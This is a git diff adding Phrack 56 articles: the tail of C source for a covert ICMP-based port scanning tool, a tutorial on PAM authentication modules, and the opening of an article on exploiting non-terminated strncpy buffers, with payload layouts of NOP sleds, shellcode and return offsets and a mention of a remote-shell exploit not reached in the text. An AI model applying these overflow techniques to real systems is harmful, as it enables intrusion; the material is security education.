+#include <netinet/ip.h>
+#include <netinet/tcp.h>
+#include <netinet/ip_icmp.h>
+
+#include <asm/types.h>
+
+#include "../include/config.h"
+#include "../include/prototypes.h"
+
+#define SNAPLEN 64
+#define ETHHDR  14
+
+
+/* Global variables */
+unsigned int dlink_s;
+const u_char *snapend;
+
+int wait_results(char *dev) {
+	
+	pcap_t                          *pd;
+	char                            *data;
+	struct pcap_pkthdr      h;
+	struct iphdr            *iph;
+	char                            *payload;
+	int x;
+
+	if(!dev) {
+		if(!(dev = pcap_lookupdev(NULL))) {
+			perror("pcap_lookupdev");                       
+			exit(1);
+		}               
+	}
+	printf("Using device %s\n", dev);       
+	
+	
+	pd = pcap_open_live(dev, SNAPLEN, 0, 10, NULL);
+	
+	switch(pcap_datalink(pd)) {
+	case DLT_EN10MB:
+	case DLT_IEEE802:
+		dlink_s = ETHHDR;
+		break;
+	case DLT_NULL:
+		dlink_s = 4;
+		break;
+	default:
+		perror("unknown datalink header");
+		exit(0);
+		break;
+	}                               
+
+	for(;;) {
+		data = pcap_next(pd, &h);       
+
+		iph = (struct iphdr *)(data + dlink_s);
+
+		if(iph->protocol == IPPROTO_ICMP) {
+			struct icmphdr *icmph = (struct icmphdr *)(data + dlink_s + iph->ihl*4);
+			if(icmph->type == 8 && icmph->code == 0) {
+				
+				payload = malloc(MAX_ICMP_PAYLOAD_SIZE);
+				memcpy(payload, data + dlink_s + iph->ihl*4 + 8, MAX_ICMP_PAYLOAD_SIZE);
+				if (!(strncmp("araiarai", payload, strlen(MAGIC)))) {
+					memcpy(&x, payload + strlen(MAGIC), sizeof(int));
+					printf("%d iz open\n", x);      
+				}
+			}                                                       
+		}
+	}
+
+
+
+}
+<-->
+<++> p56/dps/source/dps_helper.c !a6720d71
+/*
+ * dps
+ * ---
+ * helper functions
+ *
+ * lifeline
+ *
+ */
+
+char s[]; 
+char *itoa (int n) {
+
+	int i, sign, x, y, z;
+	
+	if ((sign = n) < 0)
+		n = -n;
+	i = 0;
+	do {
+		s[i++] = n % 10 + '0';
+	} while ((n /= 10) > 0);
+	if (sign < 0)
+		s[i++] = '-';
+	s[i] = '\0';
+
+	for (y = 0, z = strlen(s)-1 ; y < z ; y++, z--) {
+		x = s[y];
+		s[y] = s[z];
+		s[z] = x;
+	}
+	return s;
+}
+<-->
+<++> p56/dps/source/dps_pcap.c !dfe55d3e
+#include "../include/dps_pcap.h"
+
+void
+dps_pcap_err(char *function, char *error)
+{
+    fprintf(stderr, "%s: %s\n", function, error); 
+    exit (1);
+}
+
+pcap_t *
+dps_pcap_prep(int snaplen, char *filter, char *device)
+{
+    pcap_t              *pd;
+    bpf_u_int32          localnet, netmask;
+    struct bpf_program   fcode;
+
+	if(!device) {
+	    if ((device = pcap_lookupdev(errbuf)) == NULL)
+	{
+		dps_pcap_err("pcap_lookupdev", errbuf);
+	    }
+	}
+
+    if ((pd = pcap_open_live(device, snaplen, 1, 500, errbuf)) == NULL)
+    {
+	dps_pcap_err("pcap_open_live", errbuf);
+    }
+
+    if (pcap_lookupnet(device, &localnet, &netmask, errbuf) == -1)
+    {
+	dps_pcap_err("pcap_lookupnet", errbuf);
+    }
+
+    if (pcap_compile(pd, &fcode, filter, 1, netmask) == -1)
+    {
+	dps_pcap_err("pcap_compile", errbuf);
+    }
+
+    if (pcap_setfilter(pd, &fcode) == -1)
+    {
+	dps_pcap_err("pcap_setfilter", errbuf);
+    }
+    return (pd);
+}
+
+int
+dps_pcap_datalink(pcap_t *pd)
+{
+    int offset;
+
+    switch (pcap_datalink(pd))
+    {
+/*  There'z no such DLT in OpenBSD, I'm changing to NULL, should work
+	on solaris.
+*/
+	case DLT_NULL:
+	    offset = LOOPBACK_OFFSET;
+	    break;
+	case DLT_SLIP:
+	case DLT_PPP:
+	    offset = SLIP_PPP_OFFSET;
+	    break;
+	case DLT_EN10MB:
+	default:
+	    offset = ETHERNET_OFFSET;
+	    break;
+    }
+    return (offset);
+}
+
+void *
+dps_pcap_next(pcap_t *pd)
+{
+    void                *ptr;
+    struct pcap_pkthdr   hdr;
+
+    while ((ptr = (void *)pcap_next(pd, &hdr)) == NULL);
+
+    return (ptr);
+}
+
+/* EOF */
+<-->
+
+
+|EOF|-------------------------------------------------------------------------|
+
diff --git a/phrack56/13.txt b/phrack56/13.txt
new file mode 100644
index 0000000..56f5202
--- /dev/null
+++ b/phrack56/13.txt
@@ -0,0 +1,430 @@
+                      - P H R A C K   M A G A Z I N E -
+
+                            Volume 0xa Issue 0x38
+                                  05.01.2000
+                                  0x0d[0x10]
+
+|---------------------------- INTRODUCTION TO PAM ----------------------------|
+|-----------------------------------------------------------------------------|
+|------------------------------- Bryan Ericson -------------------------------|
+
+
+----|  INTRODUCTION
+
+The Pluggable Authentication Module (PAM) system is a means by which programs
+can perform services relating to user authentication and account maintenance.
+The authentication part is usually done through a challenge-response
+interaction.  Using PAM, an administrator can customize the methods used
+by authenticating programs without recompilation of those programs.
+
+The PAM system is comprised of four parts.  The first part, libpam, is the
+library which implements the PAM API.  The second part is the PAM
+configuration file, /etc/pam.conf.  The third consists of a suite of
+dynamically loadable binary objects, often called the service modules, which
+handle the actual work of authentication.  The final part is comprised of
+the system commands which use (or should use) the PAM API, such as login, su,
+ftp, telnet, etc...
+
+
+----|  LIBPAM
+
+The authentication routines of the PAM API consist of three primary
+functions:
+
+pam_start( const char *service_name, const char *username,
+           const struct pam_conv *conv, pam_handle_t **pamh_p );
+
+pam_end( pam_handle_t *pamh, int exit_status );
+
+pam_authenticate( pam_handle_t *pamh, int flags );
+
+The pam_start() and pam_end() functions begin and end a PAM session.  The
+arguments to pam_start() are as follows:
+
+   + service_name: a string specifying a particular service as defined
+   in the pam.conf file (see below)
+
+   + username: the login name of the user to be authenticated
+
+   + conv: a pointer to a pam_conv structure (more on this in a
+   minute)
+
+   + pamh_p: a double pointer to a pam_handle_t structure.  The PAM
+   framework will allocate and deallocate the memory for the
+   structure, and an application should never access it directly.  It
+   is basically used by the PAM framework to deal with multiple
+   concurrent PAM sessions.
+
+The pam_conv structure looks like this:
+
+struct pam_conv {
+    int (*conv)(int num_msg, const struct pam_message **msg,
+                struct pam_response **resp, void *appdata_ptr);
+    void *appdata_ptr;
+}
+
+*conv is a pointer to a function in the application known as the PAM
+conversation function.  It will be discussed below.  The appdata_ptr points to
+application-specific data, and is not often used.
+
+The pam_end() function's arguments consist of the same pam_handle_t* that was
+filled in by pam_start(), and an exit status.  The exit status is normally
+PAM_SUCCESS, but can be different in the event of an unsuccessful PAM session.
+pam_end() will deallocate the memory associated with the pam_handle_t*, and
+any attempt to re-use the handle will likely result in a seg fault.
+
+The pam_authenticate() function again consists of the pam_handle_t* filled
+in by pam_start(), and optional flags that can be passed to the framework.
+
+Some other functions in the PAM API available to applications are as follows
+(consult your system's documentation for a complete description of its PAM
+API):
+
+    + pam_set_item() - write state information for PAM session
+
+    + pam_get_item() - retrieve state information for PAM session
+
+    + pam_acct_mgmt() - checks whether the current user's account is
+    valid
+
+    + pam_open_session() - begin a new session
+
+    + pam_close_session() - close current session
+
+    + pam_setcred() - manage user credentials
+
+    + pam_chauthtok() - change user's authentication token
+
+    + pam_strerror() - returns an error string, similar to perror()
+
+
+----|  PAM.CONF
+
+The PAM configuration file is usually located in /etc/pam.conf.  It is divided
+into four sections: authentication, account management, session management,
+and password management.  A typical line looks like this:
+
+login  auth  required  /usr/lib/security/pam_unix.so.1  try_first_pass
+
+The first field is the service name.  This is the service referred to in the
+first argument to pam_start().  If the service requested by pam_start() is not
+listed in pam.conf, the default service "other" will be used.  Other service
+names might be "su" and "rlogin".  If the service name is specified more
+than once, the modules are said to be "stacked", and the behavior of the
+framework will be determined by the value of the third field, as discussed
+below.
+
+The second field denotes what action this particular service will perform.
+The valid values are "auth" for authentication, "account" for account
+management, "session" for session management, and "password" for password
+management.  Not all applications will need to access every action.  For
+example, su will need only to access the "auth" action, while "passwd" should
+need only the "password" action.
+
+The third field is known as the control field, and will require some
+discussion.  It indicates the behavior of the PAM framework if the user
+should fail the authentication.  Valid values for this field are "requisite",
+"required", "sufficient", and "optional":
+
+    + "requisite" means that if the user fails authentication for this
+    particular module, the framework will immediately return a
+    failure, and no other modules will be invoked.
+
+    + "required" denotes that if a user fails authentication, the
+    framework will return a failure only after all other modules have
+    been invoked.  This is done so that the user will not know for
+    which module authentication was denied.  For a user to
+    successfully authenticate, all "required" modules have to return
+    success.
+
+    + "optional" means that the user will be allowed access even if
+    authentication fails.  In the event of failure, the next module on
+    the stack will be processed.
+
+    + "sufficient" means that if a user passes this particular module,
+    the framework will immediately return success, even if subsequent
+    modules have "requisite" or "required" control values.  Like
+    "optional", "sufficient" will allow access even if authentication
+    fails.
+
+Note that if any module returns success, the user will succeed authentication
+with the only exception being if the user previously failed to authenticate
+with a "required" module.
+
+The fourth field in pam.conf is the path to the authentication module.  The
+path can differ between systems.  For example, the PAM modules are located
+in /usr/lib in the Linux-PAM implementation, while Solaris maintains the
+modules in /usr/lib/security.
+
+The fifth field is a space-separated list of module-dependent options, which
+are passed to the authentication module whenever it is invoked.  Consult
+the specific module's man page for details.
+
+
+----|  MODULES
+
+Each PAM module is essentially a library which must export specified functions.
+These functions are called by the PAM framework.  The functions exported by
+the library are:
+
+    + pam_sm_authenticate()
+
+    + pam_sm_setcred()
+
+    + pam_sm_acct_mgmt()
+
+    + pam_sm_open_session()
+
+    + pam_sm_close_session()
+
+    + pam_sm_chauthtok()
+
+If an implementer decides not to support a particular action within a module,
+the module should return PAM_SUCCESS for that action.  For example, if a
+module is not designed to support account management, the pam_sm_acct_mgmt()
+function should simply return PAM_SUCCESS.
+
+The declaration for pam_sm_authenticate() is as follows:
+
+extern int pam_sm_authenticate( pam_handle_t *pamh, int flags,
+       int argc, char **argv);
+
+where pamh is a pointer to a PAM handle which has been filled in by the
+framework, flags is the set of flags passed to the framework by the
+application's call to pam_authenticate(), and argc and argv are the number
+and values of the optional arguments for this service in pam.conf.
+
+A simple pam_sm_authenticate() for the pam_unix module might look like
+this:
+
+#include <security/pam_modules.h>
+#include <...>
+
+extern int
+pam_sm_authenticate( pam_handle_t *pamh, int flgs, int c, char **v )
+{
+        char *user;
+        char *passwd;
+        struct passwd *pwd;
+        int ret;
+
+        /* ignore flags and optional arguments */
+
+        if ( (ret = pam_get_user( ..., &user )) != PAM_SUCCESS )
+           return ret;
+        if ( (ret = pam_get_pass( ..., &passwd )) != PAM_SUCCESS )
+           return ret;
+        if ( (pwd = getpwnam(user)) != NULL ) {
+           if ( !strcmp(pwd->pw_passwd, crypt(passwd)) )
+              return PAM_SUCCESS;
+           else
+              return PAM_AUTH_ERR;
+        }
+
+        return PAM_AUTH_ERR;
+}
+
+Of course, this function is grossly oversimplified, but it demonstrates
+the basic functionality of pam_sm_authenticate().  It retrieves the user's
+login name and password from the framework, then retrieves the user's
+encrypted password, and finally calls crypt() on the user's password and
+compares the result with the encrypted system password.  Success or
+failure is determined on this comparison.  The functions pam_get_*() are
+calls to the framework, and may not have the same declaration between
+implementations.
+
+
+----|  THE APPLICATION
+
+A PAM application is fairly simple to implement.  The portions that deal
+with PAM must consist of a pam_start() and pam_end() pair, and a PAM
+conversation function.  Fortunately, the user-space PAM API is well-defined
+and stable, and so the conversation function will pretty much be boilerplate
+code (at least for a command-line application).  A simple implementation
+of su might look like this:
+
+#include <security/pam_appl.h>
+#include <...>
+
+int su_conv(int, const struct pam_message **,
+            struct pam_response **, void *);
+
+static struct pam_conv pam_conv = { su_conv, NULL };
+
+int
+main( int argc, char **argv )
+{
+        pam_handle_t *pamh;
+        int ret;
+        struct passwd *pwd;
+
+        /* assume arguments are correct and argv[1] is the username */
+
+        ret = pam_start("su", argv[1], &pam_conv, &pamh);
+        if ( ret == PAM_SUCCESS )
+           ret = pam_authenticate(pamh, 0);
+        if ( ret == PAM_SUCCESS )
+           ret = pam_acct_mgmt(pamh, 0);
+
+        if ( ret == PAM_SUCCESS ) {
+           if ( (pwd = getpwnam(argv[1])) != NULL )
+              setuid(pwd->pw_uid);
+           else {
+              pam_end(pamh, PAM_AUTH_ERR);
+              exit(1);
+           }
+        }
+        pam_end(pamh, PAM_SUCCESS);
+
+        /* return 0 on success, !0 on failure */
+        return ( ret == PAM_SUCCESS ? 0 : 1 );
+}
+
+int
+su_conv(int num_msg, const struct pam_message **msg,
+        struct pam_response **resp, void *appdata)
+{
+        struct pam_message *m = *msg;
+        struct pam_message *r = *resp;
+
+        while ( num_msg-- )
+        {
+                switch(m->msg_style) {
+
+                case PAM_PROMPT_ECHO_ON:
+                     fprintf(stdout, "%s", m->msg);
+                     r->resp = (char *)malloc(PAM_MAX_RESP_SIZE);
+                     fgets(r->resp, PAM_MAX_RESP_SIZE-1, stdin);
+                     m++; r++;
+                     break;
+
+                case PAM_PROMPT_ECHO_OFF:
+                     r->resp = getpass(m->msg);
+                     m++; r++;
+                     break;
+
+                case PAM_ERROR_MSG:
+                     fprintf(stderr, "%s\n", m->msg);
+                     m++; r++;
+                     break;
+
+                case PAM_TEXT_MSG:
+                     fprintf(stdout, "%s\n", m->msg);
+                     m++; r++;
+                     break;
+
+                default:
+                        break;
+                }
+        }
+        return PAM_SUCCESS;
+}
+
+The su_conv() function is the conversation function - it allows the module
+to "converse" with the user.  Each pam_message struct has a message style,
+which indicates what type of data the module wants.  The PAM_PROMPT_ECHO_ON
+and PAM_PROMPT_ECHO_OFF cases indicate that the module needs more information
+from the user.  The prompt used will be supplied by the module.  In the case
+of PAM_PROMPT_ECHO_OFF, the module usually wants a password.  It is up to
+the application to disable echoing of the characters.  The *_MSG cases are
+used for displaying messages on the user's terminal.
+
+The beauty of the PAM conversation is that all of the character-based output
+can be replaced with calls to different display systems without changing
+the authentication module.  For example, the getpass() could be replaced
+with get_gui_passwd() (or whatever) if we want to implement a gui-based
+su-like command.
+
+Note that a real conversation function should be much more robust.  Also,
+the Linux-PAM implementation supplies the misc_conv() conversation
+function for command-line interactions, which should be used if a standard
+conversation function is all that is required.  Finally, it is usually the
+application's responsibility to free() the memory allocated for the
+responses.
+
+
+----|  FUN WITH MODULES
+
+Now that you have a familiarity with PAM, we can briefly discuss custom
+authentication routines.  For example, it is easy to modify our earlier
+module so that, when authenticating the root user, a second password must
+be typed:
+
+extern int
+pam_sm_authenticate( pam_handle_t *pamh, int flgs, int c, char **v )
+{
+        char *user;
+        char *passwd;
+        struct passwd *pwd;
+        int ret;
+
+        /* ignore flags and optional arguments */
+
+        if ( (ret = pam_get_user( ..., &user )) != PAM_SUCCESS )
+           return ret;
+        if ( (ret = pam_get_pass( ..., &passwd )) != PAM_SUCCESS )
+           return ret;
+        if ( (pwd = getpwnam(user)) != NULL ) {
+           if ( !strcmp(pwd->pw_passwd, crypt(passwd)) )
+              ret = PAM_SUCCESS;
+           else
+              ret = PAM_AUTH_ERR;
+        }
+
+        if ( !strcmp(user, "root") ) {
+           pam_display_message("root user must enter secondary password");
+           if ( (ret = pam_get_pass( ..., &passwd )) != PAM_SUCCESS )
+              return ret;
+           if ( !strcmp(get_second_root_pwd(), crypt(passwd)) )
+              ret = PAM_SUCCESS;
+           else
+              ret = PAM_AUTH_ERR;
+        }
+
+        return ret;
+}
+
+Here we assume there is a function get_second_root_pwd() which returns some
+secret encrypted password.  Of course, this example is a little silly, but
+it demonstrates that we can be as free as we want to be when designing our
+PAM modules.  Also, because the modules live in user space, they have
+access to all library functions.  If you have some sort of biometric
+scanner hooked up to your machine and a library function that can access
+it, you could write a PAM module that does the following:
+
+        thumbprint_t *tp;
+        tp = scan_thumbprint();
+           /* or scan_retina() if you like James Bond */
+        if ( match_print_to_user(tp, user) )
+           return PAM_SUCCESS;
+
+
+----|  CONCLUSION
+
+The point is, the PAM modules are not limited to calling crypt() or some
+similar function on a user's password.  You are limited only by what you
+can think of.
+
+
+----|  REFERENCES
+
+"Making Login Services Independent of Authentication Technologies".
+        Samar, Vipin and Charlie Lai.
+        http://www.sun.com/software/solaris/pam/pam.external.pdf
+
+"The Linux-PAM System Administrator's Guide". Morgan, Andrew G.
+        http://www.kernel.org/pub/linux/libs/pam/Linux-PAM-html/pam.html
+
+"The Linux-PAM Module Writers' Guide".  Morgan, Andrew G.
+
+http://www.kernel.org/pub/linux/libs/pam/Linux-PAM-html/pam_modules.html
+
+"The Linux-PAM Application Developers' Guide".  Morgan, Andrew G.
+
+http://www.kernel.org/pub/linux/libs/pam/Linux-PAM-html/pam_appl.html
+
+Linux-PAM source code from FreeBSD 3.3 source packages.
+        http://www.FreeBSD.org/availability.html
+
+|EOF|-------------------------------------------------------------------------|
+
diff --git a/phrack56/14.txt b/phrack56/14.txt
new file mode 100644
index 0000000..5b851fe
--- /dev/null
+++ b/phrack56/14.txt
@@ -0,0 +1,889 @@
+                      - P H R A C K   M A G A Z I N E -
+
+                            Volume 0xa Issue 0x38
+                                  05.01.2000
+                                  0x0e[0x10]
+
+|--------- TAKING ADVANTAGE OF NON-TERMINATED ADJACENT MEMORY SPACES ---------|
+|-----------------------------------------------------------------------------|
+|------------------------- twitch <twitch@vicar.org> -------------------------|
+
+
+----|  Introduction
+
+Because Phrack needs another buffer overflow article, because most of those
+pesky strcpy()'s have been replaced with strncpys()'s, and because chicks
+dig shellcode, I present for your benefit yet another buffer overflow
+technique.  Like 'Frame Pointer Overwriting' from P55, this is not the most
+common of problems, but it does exist, and it is exploitable.
+
+This article details the hazards of non-terminated buffers (specifically
+non-terminated strings), and their potential impact on the security of a
+application.  This issue is discussed from a variety potential situations,
+culminating with an example exploit which abuses adjacent non-terminated
+string buffers together to perform program redirection via a buffer overflow.
+Like most bugs this is not an unknown problem, however judging from random
+source browsing, it appears that this is not a widely understood issue.
+
+Incidentally, the example code contains idiosyncratic architectural
+references and man page excerpts as presented from the point of view of
+FreeBSD running on the x86 architecture.
+
+Due to popular pleading, the noun 'data' is treated as singular throughout
+this document, even though that is wrong.
+
+
+----|  Rehash
+
+If you already know how buffer overflows work (and if you have read any
+issue of Phrack within the last two years, how could you not?), skip this
+section.
+
+When a program allocates a buffer, then copies arbitrary data into this
+buffer, it must ensure that there is enough room for everything that is being
+copied.  If there is more data than there is allocated memory, all data could
+still be copied, but past the end of the designated buffer and random, most
+likely quite important, data will be overwritten.  It's all really quite
+rude.  If the data being copied is supplied by the user, the user can do
+malevolent things like change the value of variables, redirect program
+execution, etc.  A common overflow will look like this:
+
+   void func(char *userdata)
+   {
+      char buf[256];
+
+      ...
+
+      strcpy(buf, userdata);
+   
+      ...
+   }
+
+The programmer assumes that the data being copied will surely be less than 256
+bytes and will fit snugly into the supplied buffer.  Unfortunately, since the
+data being copied is user-supplied, it could be damned near anything and of
+any size.  The function strcpy() will continue copying bytes from *userdata
+until a NULL is found, so any data past 256 bytes will overflow.
+
+So, in an effort to keep mean people from abusing their software, programmers
+will make sure that they only copy as much data as there is buffer space.
+To accomplish this task, they will normally do something to this effect:
+
+   void func(char *userdata)
+   {
+      char buf[256];
+
+      ...
+
+      strncpy(buf, userdata, 256);
+   
+      ...
+   }
+
+strncpy() will only copy as many bytes as are specified.  So in the above,
+the maximum amount of data that is ever copied is 256 bytes, and nothing is
+overwritten (note that the above code snippet exemplifies the problem discussed
+below).
+
+For a far superior explanation of buffer overruns, program redirection,
+and smashing the stack for fun and profit, consult the article of the
+same name as the latter in P49-10.
+
+
+----|  Pith
+
+The essence of the issue is that many functions that a programmer may take
+to be safe and/or 'magic bullets' against buffer overflows do not
+automatically terminate strings/buffers with a NULL.  That in actuality,
+the buffer size argument provided to these functions is an absolute size- not
+the size of the string.  To put a finer point on it, an excerpt from the
+strncpy() man page:
+
+   char *
+   strncpy(char *dst, const char *src, size_t len)
+
+   ...
+
+   The strncpy() copies not more than len characters into dst, appending
+   `\0' characters if src is less than len characters long, and _not_+
+   terminating dst if src is more than len characters long.
+
+   ...
+
+   +(underline present in the source)
+
+To understand the ramifications of this, consider the case of two automatic
+character arrays, allocated thusly:
+
+   char buf1[8];
+   char buf2[4];
+
+The compiler is most likely going to place these two buffers _next_ to each
+other on the stack.  Now, consider the stack for the above:
+
+Upper
+Memory   
+  ||     ---------------->  [Top of the stack]
+  ||     ---------------->  [ buf2 - 0 ]
+  ||     ---------------->  [ buf2 - 1 ]
+  ||     ---------------->  [ buf2 - 2 ]
+  ||     ---------------->  [ buf2 - 3 ]
+  ||     ---------------->  [ buf1 - 0 ]
+  ||     ---------------->  [ buf1 - 1 ]
+  ||     ---------------->  [ buf1 - 2 ]
+  ||     ---------------->  [ buf1 - 3 ]
+  ||           ...
+  ||     ---------------->  [ buf1 - 7 ]
+  ||
+  ||           ...
+  \/
+
+   [ Remember that the stack grows down on our example architecture
+     (and probably yours, too), so the above diagram looks upside down ]
+
+Thus, if a programmer were to do the following:
+
+   void
+   func()
+   {
+      char buf1[8];
+      char buf2[4];
+
+      fgets(buf1, 8, stdin);
+      strncpy(buf2, buf1, 4);
+   }
+
+Assuming that the user entered the string 'iceburn', after the strncpy()
+the stack would look like this:
+
+Upper
+Memory   
+  ||     ---------------->  [Top of the stack]
+  ||     ---------------->  [ 'i'  (buf2 - 0) ]
+  ||     ---------------->  [ 'c'  (buf2 - 1) ]
+  ||     ---------------->  [ 'e'  (buf2 - 2) ]
+  ||     ---------------->  [ 'b'  (buf2 - 3) ]
+  ||     ---------------->  [ 'i'  (buf1 - 0) ]
+  ||     ---------------->  [ 'c'  (buf1 - 1) ]
+  ||     ---------------->  [ 'e'  (buf1 - 2) ]
+  ||     ---------------->  [ 'b'  (buf1 - 3) ]
+  ||     ---------------->  [ 'u'  (buf1 - 4) ]
+  ||     ---------------->  [ 'r'  (buf1 - 5) ]
+  ||     ---------------->  [ 'n'  (buf1 - 6) ]
+  ||     ---------------->  [ 0x00 (buf1 - 7) ]
+  ||
+  ||           ...
+  \/
+
+We know from the man page that even though strncpy() is not going to copy
+more than 4 bytes.  But since the src string is longer than 4 bytes, it
+will not null-terminate either.  Thus, strlen(buf2) is now 11, even though
+sizeof(buf2) is 4.  This is not an overflow, as no data beyond the
+boundaries of the allocated space have been overwritten.  However, it does
+establish a peculiar situation.  For instance, the result of
+
+   printf("You entered: %s\n", buf2);
+
+would produce the following:
+
+  You entered: icebiceburn
+
+Not exactly the intent.
+
+
+----|  Apparition
+
+This problem surfaces in the real world in seemingly benign and arcane
+ways. The following is from syslogd.c on FreeBSD 3.2-RELEASE:
+
+   /*
+    * Validate that the remote peer has permission to log to us.
+    */
+   int
+   validate(sin, hname)
+   struct sockaddr_in *sin;
+      const char *hname;
+   {
+      int i;
+      size_t l1, l2;
+      char *cp, name[MAXHOSTNAMELEN];
+      struct allowedpeer *ap;
+
+      if (NumAllowed == 0)
+         /* traditional behaviour, allow everything */
+         return 1;
+
+      strncpy(name, hname, sizeof name);
+      if (strchr(name, '.') == NULL) {
+         strncat(name, ".", sizeof name - strlen(name) - 1);
+         strncat(name, LocalDomain, sizeof name - strlen(name) - 1);
+      }
+
+      ... 
+   }
+
+Suppose that hname is at least MAXHOSTNAMELEN bytes long and does not contain
+a '.'.  This means that the calculation for the length argument to strncat will
+expand to:
+
+   sizeof name == MAXNAMELEN
+   strlen(name) >= MAXNAMELEN
+   Thus, length will be < 0
+
+Well, since the length parameter to strncat is of type size_t, which is
+unsigned, strncat will actually be willing to append _way_ to many bytes.
+Thus, all of LocalDomain will be appended to name (which is already full),
+an overflow will occur and syslogd will seg fault when validate() returns.
+Incidentally, unless LocalDomain for the host is an appropriate offset into
+the stack, this example is exploitable only as a way to kill syslog
+(incidentally, 0xbfbfd001.com is available).
+
+
+----|  Pith + Apparition = Opportunity
+
+Although this type of overflow may be exploited in a variety of manners (and
+indeed, it will manifest itself in a variety of ways), the sexiest and easiest
+to understand is program redirection.  Please note that although the example
+situations presented are exorbitantly contrived, that similar conditions exist
+in sundry software currently in use all over the world.
+
+Now, let us address a situation where the user has control over the contents of
+two adjacent buffers.  Consider the following snippet:
+
+   int
+   main(int argc, char **argv)
+   {
+      char buf1[1024];
+      char buf2[256];
+
+      strncpy(buf, argv[1], 1024);
+      strncpy(buf2, argv[2], 256);
+
+      ...
+
+      if(somecondition)
+         print_error(buf2);
+
+   }
+
+   void print_error(char *p)
+   {
+      char mybuf[263];
+      
+      sprintf(mybuf, "error: %s", p);
+   }
+
+A stack diagram would be really large and redundant, so one will not be making
+an appearance here, but it should be fairly clear what will happen.  The
+programmer assumes that due to the liberal use of strncpy() in main(), that
+the data is clean when it reaches print_error().  Thus, it is assumed that
+sprintf() may be called without incident.  Unfortunately, since p points to
+buf2, and buf2 is not properly terminated, sprintf() will actually continue
+happily copying until it reaches a NULL somewhere after the end of buf1.
+Oh shit.
+
+
+----|  Hexploitation
+
+Exploitation (for the purpose of program redirection) in this scenario is
+slightly different than it is in the case of a traditional single-buffer
+overrun.  First, a little rehash about exploiting traditional buffer overflows.
+
+Assuming that we are overflowing a single buffer of 256 bytes, our payload
+would generally look something like this (diagrams obviously not to
+scale):
+
+  [ 0 ....................................................256.. ~280 ]
+  --------------------------------------------------------------------
+  |                |           |            |                        |
+  | Bunch of NOP's | shellcode | More NOP's | offset_to_shellcode    |
+  |                |           |            |                        |
+  --------------------------------------------------------------------
+  |                            Buffer                      |
+  |________________________________________________________|
+
+All that we do is pass enough data so that when the overflow occurs, the
+offset to the our shellcode (an address somewhere on the stack) overwrites
+the saved instruction pointer.  Thus, when the vulnerable function returns,
+program execution is redirected to our code.
+
+Now assume that we want to overflow another 256-byte buffer, say the one
+in print_error() in the code snippet from the last section.  To accomplish
+our malevolent ends however, we will have to use buf1 and buf2 in tandem.
+All we have to do is fill all of buf2 with our shellcode and NOP's, then
+use the beginning of buf1 for our offset. 
+
+Thus, after the strncpy()'s, buf1 will look like this:
+
+  [ 0 ......................................................... 1024 ]
+  --------------------------------------------------------------------
+  |                     |                                            |
+  | offset_to_shellcode |      Filled with NULL's by strncpy()       | 
+  |                     |                                            |
+  --------------------------------------------------------------------
+
+And buf2 will look like this:
+
+  [ 0 .......................................................... 256 ]
+  --------------------------------------------------------------------
+  |                     |           |                                |
+  | Bunch of NOP's      | shellcode |          More NOP's            |
+  |                     |           |                                |
+  --------------------------------------------------------------------
+
+This arrangement is required due to the way in which the buffers are arranged
+on the stack. What is supplied as argv[1] (the data that is copied into
+buf1) will be located higher in memory than the data we supply as argv[2]
+(which is copied into buf2). So technically, we supply the offset at the
+beginning of the exploit string, rather than at the end. Then, when
+print_error() is called, the stack in main(), will look like this:
+
+  [Top of stack                                          Upper Memory]
+  [ 0 .............................................~300../ /... 1280 ]
+  -------------------------------------------------------/ /----------
+  |                |           |            |            / /         |
+  | Bunch of NOP's | shellcode | More NOP's |   offset   / /  NULL's |
+  |                |           |            |            / /         |
+  -------------------------------------------------------/ /----------
+
+Which resembles greatly the traditional payload described above.
+
+When print_error() is called, it is passed a pointer to the beginning of buf2,
+or, the top of the stack in main().  Thus, when sprintf() is called, an overrun
+occurs, redirecting program execution to our shellcode, and all is lost.
+
+Note that alignment here is key, since if the compiler pads one of the buffers,
+we may run into a problem.  Which buffer is padded and the contents of the
+pad bytes both play a role in the success of exploitation.
+
+If buf2 is padded, and the padded bytes contain NULL's, no overflow (or, at
+least, no usable overflow) will occur.  If the pad bytes are _not_ null, then
+as long as the pad bytes end on a double-word boundary (which they almost
+certainly will), we can still successfully overwrite the saved instruction
+pointer.
+
+If buf1 is padded, whether or not the pad bytes contain NULL's is really of no
+consequence, as they will fall after our shellcode anyway.
+
+
+----|  Denouement
+
+As with all bugs, the fault here is not of the library functions, or of the C
+programming language, or operating systems not marking  data as non-executable,
+but that programmers do not fully realize the ramifications of what they
+are doing.  Before handling any potentially hazardous materials (arbitrary
+data), special precautions should be made.  Man pages should be read.  Buffers
+should be terminated.  Return values should be checked.  All it takes is a
+'+1' and an initialization.  How hard is this:
+
+   char buf[MAXSIZE + 1];
+   FILE *fd;
+   size_t len;
+
+   ...
+
+   memset(buf, 0, MAXSIZE + 1);
+   len = fread((void *)buf, 1, MAXSIZE, fd);
+   /*
+    * This won't actually happen, but it is supplied to
+    * prove a point
+    */
+   if(len > MAXSIZE){      
+      syslog(LOG_WARNING, "Overflow occured in pid %d, invoked by %d\n",
+            getpid(), getuid());
+      exit(1);
+   }
+
+   ...
+
+Okay, so the above is a bit silly, but the hopefully the intent is
+clear.
+
+Incidentally, the following also do not terminate on behalf of lazy
+programmers:
+
+   fread()
+   the read() family [ read(), readv(), pread() ]
+   memcpy()
+   memccpy()
+   memmove()
+   bcopy()
+   for(i = 0; i < MAXSIZE; i++)
+      buf[i] = buf2[i];
+   gethostname()
+   strncat()
+
+These functions are kind enough to null-terminate for you:
+
+   snprintf()
+   fgets()
+
+Now, go break something, or better yet, go fix something.
+
+
+----|  Example
+
+Attached is an example exploit for an example vulnerable program.  The
+vulnerable program is pathetically contrived, and serves no purpose other
+than:
+
+   a) Offering an example of explaining the considerations of 
+      exploiting this type of buffer overrun.
+   b) Offering a viable opportunity to pimp some new shellcode.
+
+The decision not to present an exploit to real software was due to:
+
+   a) The fact that publishing 0-day in Phrack is rude.
+   b) If I didn't report the bugs I've found I would be a prick.
+   c) The fact that any bugs that I have found should already be patched
+      by the time this comes out.
+   d) The presented example is easier to follow than a real-world app.
+   e) The point of this article is to inform, not help you tag
+      www.meaninglessdomain.com.
+
+But hey, you're getting free shellcode, so reading this wasn't an entire
+waste of time.
+
+The exploit itself will throw a shell to any system and port you deem
+necessary.  I think that's useful.  Read the comments in boobies.c for
+instructions on how to use.
+
+The shellcode is i386-FreeBSD specific, so in order to play with this the
+vulnerable proggy will need to be run on an x86 FreeBSD machine.  The exploit
+should compile and run on anything -- though you may have to tweak the
+alignment for your particular architecture.
+
+Incidentally, x86 Linux and SPARC Solaris versions of the shellcode are
